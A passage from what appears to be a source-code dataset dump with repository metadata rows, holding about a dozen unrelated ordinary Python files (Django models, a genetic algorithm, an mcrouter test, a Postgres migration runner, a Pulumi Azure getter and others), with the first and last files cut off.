        lambda output_to: _make_result(sys.stdout, options, filter_predicate),
        output_path=None,
        passthrough=(not options.no_passthrough),
        forward=False,
        protocol_version=2,
        input_stream=find_stream(sys.stdin, args))
    sys.exit(0)


if __name__ == '__main__':
    main()
|
[
"marcosptf@yahoo.com.br"
] |
marcosptf@yahoo.com.br
|
|
56543401f8fff6de82cf72f6710a4d11cd322f0f
|
265a07a2becd232b292872d1d7136789463874be
|
/lei练习/child.py
|
a18eb14e18c20325173e5d20365a90e17db5663c
|
[] |
no_license
|
Lz0224/Python-exercise
|
f4918b8cd5f7911f0c35c0458c2269959937d07d
|
3d09f54aebc653f4a5b36765b25c7241e3960764
|
refs/heads/master
| 2020-12-24T22:20:55.573019
| 2017-08-11T07:18:16
| 2017-08-11T07:18:16
| 100,005,776
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 686
|
py
|
#!/usr/bin/python
#coding=utf-8
class ParentClass(object):
    """Parent class demonstrating inheritance of attributes and methods
    (Python 2 exercise)."""
    # Class attribute, inherited by all subclasses below.
    name = "老张"
    # Commented-out constructor template kept from the exercise scaffold:
    # def __init__(self, arg):
    # super(ParentClass, self).__init__()
    # self.arg = arg
    def fun(self):
        # Python 2 print statement; the (Chinese) string is program output
        # and is left unchanged.
        print "老子有钱"
class ChildClass(ParentClass):
    # Docstring means roughly "What is this thing...."; left unchanged because
    # this module prints ChildClass.__doc__ at runtime, so editing it would
    # change program output.
    """这是什么玩意。。。。"""
    # Commented-out constructor template kept from the exercise scaffold
    # (note the incomplete super(, self) call — it was never meant to run):
    # def __init__(self, arg):
    # super(, self).__init__()
    # self.arg = arg
    def fun1(self):
        # Python 2 print statement; string is program output, left unchanged.
        print "哥也有钱"
class GrentChildClass(ChildClass):
    # NOTE(review): name is presumably a typo for "GrandChildClass"; renaming
    # would change the public interface, so it is only flagged here.
    pass


# Demonstration: attributes and methods resolve through the inheritance chain.
child = ChildClass()
print child.name          # inherited from ParentClass
child.fun()

grent_child = GrentChildClass()
print grent_child.name    # resolved two levels up the chain

print dir(ParentClass)    # introspection: attribute names of ParentClass
print ChildClass.__doc__  # prints the (Chinese) docstring verbatim
|
[
"Lz0o_o0@outlook.com"
] |
Lz0o_o0@outlook.com
|
374a204faa07f80ad6187a04e03dc1f385ef9168
|
7619aed8a311e2832634379762c373886f4354fb
|
/trace_pox_eel_l2_multi-BinaryLeafTreeTopology1-steps200/interactive_replay_config.py
|
642e4a4db5b05f5ecefc4f4ffd682ee68f5bc5b3
|
[] |
no_license
|
jmiserez/sdnracer-traces
|
b60f8588277c4dc2dad9fe270c05418c47d229b3
|
8991eee19103c8ebffd6ffe15d88dd8c25e1aad5
|
refs/heads/master
| 2021-01-21T18:21:32.040221
| 2015-12-15T14:34:46
| 2015-12-15T14:34:46
| 39,391,225
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,097
|
py
|
# STS interactive-replay configuration for a recorded POX controller trace.
# NOTE(review): this file appears auto-generated alongside the trace it
# references; values are trace-specific.

from config.experiment_config_lib import ControllerConfig
from sts.topology import *
from sts.control_flow.interactive_replayer import InteractiveReplayer
from sts.simulation_state import SimulationConfig
from sts.input_traces.input_logger import InputLogger

# One POX controller (discovery + l2_multi forwarding) launched from a local
# checkout; __address__/__port__ are substituted by STS at start time.
simulation_config = SimulationConfig(controller_configs=[ControllerConfig(start_cmd=' ./pox.py --verbose openflow.of_01 --address=__address__ --port=__port__ openflow.discovery forwarding.l2_multi_orig', label='c1', address='127.0.0.1', cwd='/home/ahassany/repos/pox/')],
                                     topology_class=BinaryLeafTreeTopology,
                                     topology_params="num_levels=1",
                                     patch_panel_class=BufferedPatchPanel,
                                     multiplex_sockets=False,
                                     ignore_interposition=False,
                                     kill_controllers_on_exit=True)

# Replay the recorded event trace interactively against the simulation above.
control_flow = InteractiveReplayer(simulation_config, "traces/trace_pox_eel_l2_multi-BinaryLeafTreeTopology1-steps200/events.trace")
# wait_on_deterministic_values=False
# delay_flow_mods=False
# Invariant check: 'InvariantChecker.check_liveness'
# Bug signature: ""
|
[
"eahmed@ethz.ch"
] |
eahmed@ethz.ch
|
176869291f6071bba98ea44848936d7ceec24616
|
9b3abcd9c207a015ed611da2a22b48957e46c22d
|
/18_Django框架网站/dailyfresh/apps/user/models.py
|
7d2b0e2c38e7610873de8a89d398099678359f03
|
[] |
no_license
|
it-zyk/PythonCode
|
6e22aff6705d0e66df74a7c43f62f8a3a8f3f70f
|
1ee51edad768ff01ba8542b1ddea05aee533524b
|
refs/heads/master
| 2020-04-23T05:47:33.691995
| 2019-05-08T14:07:34
| 2019-05-08T14:07:34
| 170,951,360
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,596
|
py
|
from django.db import models
from django.contrib.auth.models import AbstractUser
from db.base_model import BaseModel
# Create your models here.
class User(AbstractUser, BaseModel):
    """User model: Django's AbstractUser combined with the project's
    BaseModel (which presumably adds common audit fields — defined in
    db.base_model, outside this file)."""
    class Meta:
        db_table = 'df_user'
        # Admin-facing labels ("user"); runtime strings, left in Chinese.
        verbose_name = '用户'
        verbose_name_plural = verbose_name
class AddressManager(models.Manager):
    """Custom model manager for Address.

    Custom managers are used to:
    1. change the base queryset returned by e.g. ``all()``, and
    2. encapsulate table-level operations (CRUD helpers) for the model.
    """
    def get_default_address(self, user):
        """Return *user*'s default shipping address, or None if absent."""
        # self.model is the model class this manager is attached to.
        try:
            address = self.get(user=user, is_default=True)  # models.Manager lookup
        except self.model.DoesNotExist:
            # The user has no default shipping address.
            address = None
        return address
class Address(BaseModel):
    """Shipping address model."""
    # Owning user account ("所属账户" = owning account).
    user = models.ForeignKey('User', verbose_name='所属账户')
    # Recipient name.
    receiver = models.CharField(max_length=20, verbose_name='收件人')
    # Street address.
    addr = models.CharField(max_length=256, verbose_name='收件地址')
    # Postal code (6 characters, optional).
    zip_code = models.CharField(max_length=6, null=True, verbose_name='邮政编码')
    # Contact phone number.
    phone = models.CharField(max_length=11, verbose_name='联系电话')
    # Whether this is the user's default shipping address.
    is_default = models.BooleanField(default=False, verbose_name='是否默认')

    # Attach the custom manager so Address.objects gains get_default_address().
    objects = AddressManager()

    class Meta:
        db_table = 'df_address'
        # Admin-facing labels ("address"); runtime strings, left in Chinese.
        verbose_name = '地址'
        verbose_name_plural = verbose_name
|
[
"it-zyk@outlook.com"
] |
it-zyk@outlook.com
|
1d82f772f429dc0332e5f8d1b7f993895f9f527b
|
b2e1d96c0551b6b31ef85353f9b6e5b6354d64e8
|
/datafaucet/spark/rows.py
|
97e9ffa97152917b124d55ef93a80b38b4716046
|
[
"MIT"
] |
permissive
|
SylarCS/datafaucet-1
|
8bd7b96cecc5592e153b61367892e2a63a96119d
|
a63074ba1fb1a6d15f06e2bfff05df754aaaa452
|
refs/heads/master
| 2020-09-15T06:04:31.999012
| 2019-11-18T20:00:55
| 2019-11-18T20:00:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,062
|
py
|
import sys
from random import randint
from pyspark.sql import DataFrame
from datafaucet.spark import dataframe
INT_MAX = sys.maxsize
INT_MIN = -sys.maxsize-1
def sample(df, n=1000, *col, seed=None):
    """Sample rows from a Spark DataFrame.

    n interpretation:
      - 0 < n <= 1 (float): fraction of rows to sample;
      - n > 1 (int): approximate number of rows to sample.

    todo:
      - n as dict of key, value pairs or array of (key, value)
      - cols: take a list of columns for stratified sampling when more than
        one column is provided; if a stratum is not specified, fill it
        equally from what is left over from the total of the other quota.
    """
    if n > 1:
        # Absolute row count requested: convert to a fraction of the total.
        total = df.count()
        fraction = n / total
        if fraction > 1:
            # Asked for more rows than exist: return the DataFrame as-is.
            return df
        return df.sample(False, fraction, seed=seed)
    # n is already a fraction.
    return df.sample(False, n, seed=seed)


# Module-level alias so methods named ``sample`` can still reach this function.
_sample = sample
class Rows:
    """Row-oriented facade over a Spark DataFrame.

    scols: selected (data) columns; gcols: grouping columns. The two sets
    never overlap — gcols win on conflict.
    """

    def __init__(self, df, scols=None, gcols=None):
        self.df = df
        self.gcols = gcols or []
        self.scols = scols or df.columns
        # Selected columns exclude the grouping columns.
        self.scols = list(set(self.scols) - set(self.gcols))

    @property
    def columns(self):
        # Preserve the dataframe's native column order.
        return [x for x in self.df.columns if x in (self.scols + self.gcols)]

    def overwrite(self, data):
        """Build a new dataframe from `data` using this dataframe's schema."""
        df = self.df
        return df.sql_ctx.createDataFrame(data, df.schema)

    def append(self, data):
        """Append `data` (same schema) to the current rows."""
        df = self.df
        return df.unionByName(df.sql_ctx.createDataFrame(data, df.schema))

    def sample(self, n=1000, *cols, random_state=True):
        """Sample rows; see module-level sample() for the n semantics.

        BUG FIX: random_state was previously passed positionally, where it
        landed in the *col catch-all of sample() and left seed=None. It is
        now forwarded as the seed keyword.
        """
        return _sample(self.df, n, *cols, seed=random_state)

    def filter_by_date(self, column=None, start=None, end=None, window=None):
        """Filter rows by a datetime column / range / window."""
        return dataframe.filter_by_datetime(self.df, column, start, end, window)

    def filter(self, *args, **kwargs):
        """Pass-through to DataFrame.filter."""
        return self.df.filter(*args, **kwargs)

    @property
    def cols(self):
        # Imported lazily to avoid a circular import with datafaucet.spark.cols.
        from datafaucet.spark.cols import Cols
        return Cols(self.df, self.scols, self.gcols)

    @property
    def data(self):
        # Lazy import for the same circularity reason as `cols`.
        from datafaucet.spark.data import Data
        return Data(self.df, self.scols, self.gcols)
# Expose the Rows facade as a read-only `.rows` property on every
# pyspark DataFrame instance (monkey-patch applied at import time).
def _rows(self):
    return Rows(self)

DataFrame.rows = property(_rows)
|
[
"natalino.busa@gmail.com"
] |
natalino.busa@gmail.com
|
87a59bc42433821ff6c353a9e24ee2417a5de00f
|
a6fae33cdf3d3cb0b0d458c2825a8d8cc010cd25
|
/l3/z3/.history/population_20200522014505.py
|
3e8108e382a859c114f46c50cbcf52c462b42894
|
[] |
no_license
|
Qabrix/optimization_amh
|
12aab7c7980b38812ec38b7e494e82452a4176b4
|
6a4f5b897a4bef25f6e2acf535ba20ace7351689
|
refs/heads/main
| 2022-12-28T10:57:00.064130
| 2020-10-17T22:57:27
| 2020-10-17T22:57:27
| 304,983,340
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,540
|
py
|
import random
import numpy as np
from utils import calculate_value, decision
class Inhabitant:
    """One GA candidate: a gene (list of characters) plus its fitness value."""

    def __init__(self, gene, value=0):
        self.gene = gene
        # BUG FIX: the constructor previously ignored `value` and always
        # stored 0; honor the argument (the default keeps old behavior for
        # callers that omit it).
        self.value = value

    def __iter__(self):
        # Iterate the individual characters of the gene.
        for char in self.gene:
            yield char

    def __len__(self):
        return len(self.gene)

    def __getitem__(self, item):
        return self.gene[item]

    def get_str_gene(self, up):
        """Return the first `up` characters of the gene joined as a string."""
        return "".join(self.gene[:up])
class Population:
    """A GA population of Inhabitant candidates over a fixed character pool."""

    def __init__(self, population_size, all_puzzle_keys, starter_words):
        # Pool of characters every gene is drawn from (each used at most once).
        self.all_puzzle_keys = all_puzzle_keys
        self.best_res = None
        self.population_size = population_size
        self.generation = self._gen_generation(starter_words)

    def __iter__(self):
        for inhabitant in self.generation:
            yield inhabitant

    def _random_word(self):
        """Return a random permutation of the full character pool."""
        return random.sample(self.all_puzzle_keys, len(self.all_puzzle_keys))

    def _gen_generation(self, starter_words):
        """Seed the generation with the starter words, then fill up to
        population_size with random words whose length matches the
        starter-word length range."""
        min_size = min([len(word) for word in starter_words])
        max_size = max([len(word) for word in starter_words])
        generation = []
        for word in starter_words:
            generation.append(Inhabitant(list(word)))
        for _ in range(len(starter_words), self.population_size):
            word = self._random_word()[: random.randint(min_size, max_size)]
            generation.append(Inhabitant(word))
        return generation

    def sorted_generation(self):
        """Current generation sorted by fitness, best first."""
        return sorted(self.generation, key=lambda x: x.value, reverse=True)

    def make_selection(self, elite_percentage, percentage=0.75):
        """Pick `percentage` of the population: the elite head plus the
        same-sized tail of the fitness-sorted generation."""
        selection = []
        sorted_generation = self.sorted_generation()
        selection_size = int(self.population_size * percentage)
        elite_size = int(elite_percentage * selection_size)
        for inhabitant in sorted_generation[:elite_size]:
            selection.append(inhabitant)
        if elite_size - selection_size < 0:
            # Fill the remainder from the end of the sorted list.
            for inhabitant in sorted_generation[elite_size - selection_size :]:
                selection.append(inhabitant)
        return selection

    def _check_if_correct(self, word):
        """True if `word` uses only pool characters, each at most once."""
        possible_chars = self.all_puzzle_keys.copy()
        for char in word:
            if char in possible_chars:
                possible_chars.remove(char)
            else:
                return False
        return True

    def recombinate(self, elite_percentage=0.6):
        """One-point crossover over a random permutation of the selection;
        the two best selected genes are carried over unchanged (elitism).
        Offspring violating the character-pool constraint fall back to a
        parent's gene."""
        selection = self.make_selection(elite_percentage)
        permutation = np.random.permutation(len(selection))
        new_generation = []
        new_generation.append(Inhabitant(selection[0].gene.copy()))
        new_generation.append(Inhabitant(selection[1].gene.copy()))
        for i in range(1, len(permutation)):
            # Crossover point in the first half of the shorter parent.
            pivot = random.randint(
                0,
                min(
                    len(selection[permutation[i % len(permutation)]]),
                    len(selection[permutation[(i + 1) % len(permutation)]]),
                )
                // 2,
            )
            new_word = (
                selection[permutation[i % len(permutation)]][:pivot]
                + selection[permutation[(i + 1) % len(permutation)]][pivot:]
            )
            if self._check_if_correct(new_word):
                new_generation.append(Inhabitant(new_word))
            else:
                new_generation.append(
                    Inhabitant(selection[permutation[i % len(permutation)]].gene)
                )
            # Mirror-image child from the same pair of parents.
            new_word = (
                selection[permutation[(i + 1) % len(permutation)]][:pivot]
                + selection[permutation[i % len(permutation)]][pivot:]
            )
            if self._check_if_correct(new_word):
                new_generation.append(Inhabitant(new_word))
            else:
                new_generation.append(
                    Inhabitant(selection[permutation[(i + 1) % len(permutation)]].gene)
                )
        self.generation = new_generation

    def mutate(
        self,
        min_swap_probability=0.2,
        max_swap_probability=0.7,
        inverse_probability=0.001,
        random_probability=0.05,
        shift_probability=0.001,
        insert_probability=0.9,
    ):
        """Mutate every inhabitant except the first (elitism): grow/shrink
        the gene, replace it wholesale, or shift/swap/invert characters.
        NOTE(review): probabilities are applied per inhabitant via
        decision(); exact nesting reconstructed from the original layout."""
        swap_probability = random.uniform(min_swap_probability, max_swap_probability)
        for inhabitant in self.generation[1:]:
            if decision(insert_probability):
                insert_amount = random.randint(1, 2)
                if decision(0.5):  # grow-vs-shrink decision
                    if(len(inhabitant)+insert_amount < len(self.all_puzzle_keys)):
                        # Characters from the pool not yet used by this gene.
                        possible_chars = self._random_word()
                        for char in inhabitant.gene:
                            if char in possible_chars:
                                possible_chars.remove(char)
                        if decision(0.33):
                            inhabitant.gene += possible_chars[:insert_amount]
                        elif decision(0.5):
                            inhabitant.gene = possible_chars[:insert_amount] + inhabitant.gene
                        else:
                            insert_index = random.randint(1, len(inhabitant.gene))
                            inhabitant.gene = inhabitant.gene[:insert_index] + possible_chars[:insert_amount] + inhabitant.gene[insert_index:]
                else:
                    if(len(inhabitant)-insert_amount > 0):
                        if decision(0.5):
                            inhabitant.gene = inhabitant.gene[insert_amount:]
                        else:
                            inhabitant.gene = inhabitant.gene[:-insert_amount]
            elif decision(random_probability):
                inhabitant.gene = self._random_word()
            else:
                if decision(shift_probability):
                    # Rotate the gene right by shift_range+1 positions.
                    shift_range = random.randint(1, 3)
                    for _ in range(shift_range + 1):
                        inhabitant.gene = [inhabitant.gene[-1]] + inhabitant.gene[:-1]
                for i in range(len(inhabitant.gene) // 2):
                    if decision(swap_probability):
                        random_id = random.randint(0, len(inhabitant) - 1)
                        inhabitant.gene[i], inhabitant.gene[random_id] = (
                            inhabitant.gene[random_id],
                            inhabitant.gene[i],
                        )
                if decision(inverse_probability):
                    inhabitant.gene = inhabitant.gene[::-1]
|
[
"kubabalicki@gmail.com"
] |
kubabalicki@gmail.com
|
8efeda44d905898ff678ae343caf148717963d54
|
38c606ed14564591c1aa6e65c7dab255aebf76f9
|
/0x11-python-network_1/5-hbtn_header.py
|
2c76d103cd07681c5295f2c7dd0ea62d4798e81a
|
[] |
no_license
|
camilooob/holbertonschool-higher_level_programming
|
d7cee708b308bed86fcc384d7451de26fa9cafaa
|
db9b6760e7e4998c5f00a4f2cfeb17ec14e44cab
|
refs/heads/master
| 2020-09-29T00:19:25.736344
| 2020-05-15T01:34:32
| 2020-05-15T01:34:32
| 226,900,553
| 1
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 183
|
py
|
#!/usr/bin/python3
"""Print the X-Request-Id response header of the URL given as argv[1]."""
if __name__ == "__main__":
    import sys
    import requests

    response = requests.get(sys.argv[1])
    print(response.headers.get('X-Request-Id'))
|
[
"camilobaq@hotmail.com"
] |
camilobaq@hotmail.com
|
0332091c980a247b508924dc4e03710be5f08839
|
b0856a2d66cc4c71705b8c16c169848070294cf6
|
/removeDupSortedArray.py
|
3f60a7ee970822ff9418506693aa240504fabb51
|
[] |
no_license
|
jfriend08/LeetCode
|
9e378ff015edc3102a4785b0832cf0eeb09f5fc2
|
f76d3cf2e7fd91767f80bd60eed080a7bad06e62
|
refs/heads/master
| 2021-01-21T19:28:25.354537
| 2016-01-15T04:53:11
| 2016-01-15T04:53:11
| 28,518,328
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 832
|
py
|
'''
Follow up for "Remove Duplicates":
What if duplicates are allowed at most twice?
For example,
Given sorted array nums = [1,1,1,2,2,3],
Your function should return length = 5, with the first five elements of nums being 1, 1, 2, 2 and 3.
It doesn't matter what you leave beyond the new length.
Subscribe to see which companies asked this question
'''
class Solution(object):
    def removeDuplicates(self, nums):
        """Remove duplicates from sorted `nums` so each value appears at
        most twice, compacting the list in place; return the new length.

        Fixes over the counting version:
        - negative values are no longer dropped (the old scan iterated
          xrange(0, max+1) and skipped anything below zero)
        - O(1) extra space instead of a dict plus a rebuilt list
        - nums is now actually compacted in place, as the problem requires
        """
        write = 0
        for num in nums:
            # Keep num unless the last two kept values already equal it;
            # valid because the input is sorted.
            if write < 2 or num != nums[write - 2]:
                nums[write] = num
                write += 1
        return write
# Ad-hoc driver (Python 2 print statements).
sol = Solution()
print sol.removeDuplicates([1,1,1,2,2,3])
print sol.removeDuplicates([])
|
[
"ys486@cornell.edu"
] |
ys486@cornell.edu
|
bfe8e4bc295bbf5a06577105e22905e15b024ebe
|
1aec3c93eaa1fc271ea80141a3a41a24cd60c8d9
|
/mcrouter/test/test_loadbalancer_route.py
|
854b6970f6db6a6b80bfcb4620c6a999a5ebd5a3
|
[
"BSD-3-Clause"
] |
permissive
|
boboozy/mcrouter
|
810859b997ea2c687c67723a3ad94aa88e93b746
|
d78f599bd3887a87d5785422a25e3ac07b0de169
|
refs/heads/master
| 2021-07-25T09:52:09.175808
| 2017-11-04T01:02:51
| 2017-11-04T01:11:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,743
|
py
|
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.MCProcess import Mcrouter
from mcrouter.test.McrouterTestCase import McrouterTestCase
class TestLoadBalancerRoute(McrouterTestCase):
    """End-to-end check that LoadBalancerRoute spreads gets over all children."""

    config = './mcrouter/test/test_loadbalancer_route.json'
    null_route_config = './mcrouter/test/test_nullroute.json'
    mcrouter_server_extra_args = ['--server-load-interval-ms=50']
    extra_args = []

    def setUp(self):
        # Eight identical null-route backends for the balancer to pick from.
        self.mc = []
        for _i in range(8):
            self.mc.append(Mcrouter(self.null_route_config,
                                    extra_args=self.mcrouter_server_extra_args))
            self.add_server(self.mc[_i])
        self.mcrouter = self.add_mcrouter(
            self.config,
            extra_args=self.extra_args)

    def test_loadbalancer(self):
        n = 20000
        for i in range(n):
            key = 'someprefix:{}:|#|id=123'.format(i)
            self.assertTrue(not self.mcrouter.get(key))
        self.assertTrue(self.mcrouter.stats()['cmd_get_count'] > 0)
        lblrc = 'load_balancer_load_reset_count'
        self.assertEqual(int(self.mcrouter.stats("all")[lblrc]), 0)
        # FIX: the accumulator was named `sum`, shadowing the builtin.
        total = 0
        for i in range(8):
            # Every backend must have received at least one get ...
            self.assertTrue(self.mc[i].stats()['cmd_get_count'] > 0)
            total += int(self.mc[i].stats()['cmd_get_count'])
        # ... and together they must account for every request sent.
        self.assertEqual(total, n)
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
2c198ce9caa80d3848e36c87c340082b71dfce04
|
4d37628a27c5a50a70fa06f78be346223c37ade0
|
/jobs/migrations.py
|
88f61681fe41fbe0da93397de6760842a9ab4e57
|
[
"MIT"
] |
permissive
|
vinissimus/jobs
|
93dbc0fd2c755b63d685165996b27a260e5e367c
|
6e15749465f7da44e4dc0ad2f520ea6f7fbb67fe
|
refs/heads/master
| 2023-01-01T01:29:50.332671
| 2020-10-23T15:27:49
| 2020-10-23T15:27:49
| 281,219,465
| 7
| 0
|
MIT
| 2020-10-23T15:31:47
| 2020-07-20T20:30:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,978
|
py
|
from .utils import setup_stdout_logging
from pathlib import Path
import asyncio
import asyncpg
import glob
import logging
import sys
import typing
# Package logger and the location of this module (anchor for the sql/ dir).
logger = logging.getLogger("jobs")
current = Path(__file__)
def get_migrations_path() -> Path:
    """Directory holding the bundled *.up.sql migration files."""
    return Path(current.parent, "sql")
def get_available():
    """Map migration version number -> filename for every *.up.sql bundled."""
    base = str(get_migrations_path())
    available = {}
    for match in glob.glob(f"{base}/*.up.sql"):
        # Filenames look like "<version>_<description>.up.sql".
        name = match.replace(base + "/", "")
        available[int(name.split("_")[0])] = name
    return available
def load_migration(name: str):
    """Return the SQL text of the named migration file."""
    path = get_migrations_path() / name
    with path.open() as handle:
        return handle.read()
async def migrate(db: asyncpg.Connection = None):
    """Apply every migration newer than the recorded version, in order,
    inside a single transaction, then update jobs.migrations."""
    migrations = get_available()
    try:
        current = await db.fetchval("SELECT migration FROM jobs.migrations")
    except asyncpg.exceptions.UndefinedTableError:
        # Fresh database: no history table yet, start from version 0.
        current = 0
    logger.info("Current migration %s", current)
    applied = current
    async with db.transaction():
        for avail in sorted(list(migrations.keys())):
            if avail > current:
                logger.info("Appling migration %s", migrations[avail])
                data = load_migration(migrations[avail])
                await db.execute(data)
                applied = avail
        if applied != current:
            logger.info("Update migrations history version: %s", applied)
            # Assumes the migrations SQL itself created/seeded this row.
            await db.execute("update jobs.migrations set migration=$1", applied)
        else:
            logger.info("No migrations applied. Your db it's at latest version")
async def main(dsn: str):
    """Connect to the given DSN and run all pending migrations."""
    connection = await asyncpg.connect(dsn=dsn)
    await migrate(connection)
# CLI usage text printed when the wrong number of arguments is given.
usage = """
run it with:
job-migrations postgresql://xxx:xxxx@localhost:5432/db
"""
def run():
    """Console entry point: `job-migrations <dsn>`."""
    if len(sys.argv) != 2:
        print(usage)
        sys.exit(1)
    setup_stdout_logging()
    asyncio.run(main(sys.argv[1]))


if __name__ == "__main__":
    run()
|
[
"jordic@gmail.com"
] |
jordic@gmail.com
|
a98daa0410363b639ee81fc77a48ba3c678abf66
|
48e124e97cc776feb0ad6d17b9ef1dfa24e2e474
|
/sdk/python/pulumi_azure_native/insights/get_guest_diagnostics_settings_association.py
|
3440cdd68c76aa4250f607aaf13bbb8ba2ffb7dc
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
bpkgoud/pulumi-azure-native
|
0817502630062efbc35134410c4a784b61a4736d
|
a3215fe1b87fba69294f248017b1591767c2b96c
|
refs/heads/master
| 2023-08-29T22:39:49.984212
| 2021-11-15T12:43:41
| 2021-11-15T12:43:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,562
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetGuestDiagnosticsSettingsAssociationResult',
'AwaitableGetGuestDiagnosticsSettingsAssociationResult',
'get_guest_diagnostics_settings_association',
'get_guest_diagnostics_settings_association_output',
]
@pulumi.output_type
# NOTE: generated by the Pulumi SDK Generator — do not hand-edit the logic.
@pulumi.output_type
class GetGuestDiagnosticsSettingsAssociationResult:
    """
    Virtual machine guest diagnostic settings resource.
    """
    def __init__(__self__, guest_diagnostic_settings_name=None, id=None, location=None, name=None, tags=None, type=None):
        # Each argument is type-checked then stored via pulumi.set, as
        # required by the @pulumi.output_type protocol.
        if guest_diagnostic_settings_name and not isinstance(guest_diagnostic_settings_name, str):
            raise TypeError("Expected argument 'guest_diagnostic_settings_name' to be a str")
        pulumi.set(__self__, "guest_diagnostic_settings_name", guest_diagnostic_settings_name)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if location and not isinstance(location, str):
            raise TypeError("Expected argument 'location' to be a str")
        pulumi.set(__self__, "location", location)
        if name and not isinstance(name, str):
            raise TypeError("Expected argument 'name' to be a str")
        pulumi.set(__self__, "name", name)
        if tags and not isinstance(tags, dict):
            raise TypeError("Expected argument 'tags' to be a dict")
        pulumi.set(__self__, "tags", tags)
        if type and not isinstance(type, str):
            raise TypeError("Expected argument 'type' to be a str")
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="guestDiagnosticSettingsName")
    def guest_diagnostic_settings_name(self) -> str:
        """
        The guest diagnostic settings name.
        """
        return pulumi.get(self, "guest_diagnostic_settings_name")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Azure resource Id
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter
    def location(self) -> str:
        """
        Resource location
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Azure resource name
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        """
        Resource tags
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Azure resource type
        """
        return pulumi.get(self, "type")
# Generated awaitable wrapper: lets the result be used with `await` while
# resolving immediately (the generator body never actually yields).
class AwaitableGetGuestDiagnosticsSettingsAssociationResult(GetGuestDiagnosticsSettingsAssociationResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return GetGuestDiagnosticsSettingsAssociationResult(
            guest_diagnostic_settings_name=self.guest_diagnostic_settings_name,
            id=self.id,
            location=self.location,
            name=self.name,
            tags=self.tags,
            type=self.type)
def get_guest_diagnostics_settings_association(association_name: Optional[str] = None,
                                               resource_uri: Optional[str] = None,
                                               opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetGuestDiagnosticsSettingsAssociationResult:
    """
    Virtual machine guest diagnostic settings resource.
    API Version: 2018-06-01-preview.


    :param str association_name: The name of the diagnostic settings association.
    :param str resource_uri: The fully qualified ID of the resource, including the resource name and resource type.
    """
    __args__ = dict()
    __args__['associationName'] = association_name
    __args__['resourceUri'] = resource_uri
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        # Default to this SDK's version when the caller did not pin one.
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('azure-native:insights:getGuestDiagnosticsSettingsAssociation', __args__, opts=opts, typ=GetGuestDiagnosticsSettingsAssociationResult).value

    return AwaitableGetGuestDiagnosticsSettingsAssociationResult(
        guest_diagnostic_settings_name=__ret__.guest_diagnostic_settings_name,
        id=__ret__.id,
        location=__ret__.location,
        name=__ret__.name,
        tags=__ret__.tags,
        type=__ret__.type)
# Output-typed variant generated from the plain function above; the
# decorator supplies the implementation, so the body is intentionally `...`.
@_utilities.lift_output_func(get_guest_diagnostics_settings_association)
def get_guest_diagnostics_settings_association_output(association_name: Optional[pulumi.Input[str]] = None,
                                                      resource_uri: Optional[pulumi.Input[str]] = None,
                                                      opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetGuestDiagnosticsSettingsAssociationResult]:
    """
    Virtual machine guest diagnostic settings resource.
    API Version: 2018-06-01-preview.


    :param str association_name: The name of the diagnostic settings association.
    :param str resource_uri: The fully qualified ID of the resource, including the resource name and resource type.
    """
    ...
|
[
"noreply@github.com"
] |
bpkgoud.noreply@github.com
|
1fcab9c53a7ede0ecb7dfb6ee6e2ec6b84a8d078
|
0f44be0680ccbc2f8f96abfe97f5d1a094cd6e98
|
/erokov.py
|
494d719d07af47089ded91dc77709f24a452c75e
|
[] |
no_license
|
kimihito/erokov
|
f75bf3199531af17a700dac854f00df19b59d3c1
|
32390edbade3d84f8be87367654ff1f6c229ca62
|
refs/heads/master
| 2016-09-05T23:20:41.926046
| 2012-08-27T10:33:11
| 2012-08-27T10:33:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,019
|
py
|
#!/usr/bin/env python
# coding: utf-8
#AVのタイトルをマルコフ連鎖で作るスクリプトを書いてます
import random
import MeCab
def wakati(text):
    """Tokenize `text` with MeCab (wakati mode) and return the tokens."""
    tagger = MeCab.Tagger("-Owakati")
    parsed = tagger.parse(text)
    # MeCab's -Owakati output is space-separated surface forms.
    return parsed.split(" ")
if __name__ == "__main__":
    # Build a 2nd-order Markov chain over tokens of all titles, then
    # generate one sentence of 11 transitions. (Python 2 code.)
    filename = "title_sort_uniq.txt"
    wordlist = []
    src = open(filename,"r").read().split("\n")
    for tmpsrc in src:
        wordlist += wakati(tmpsrc)
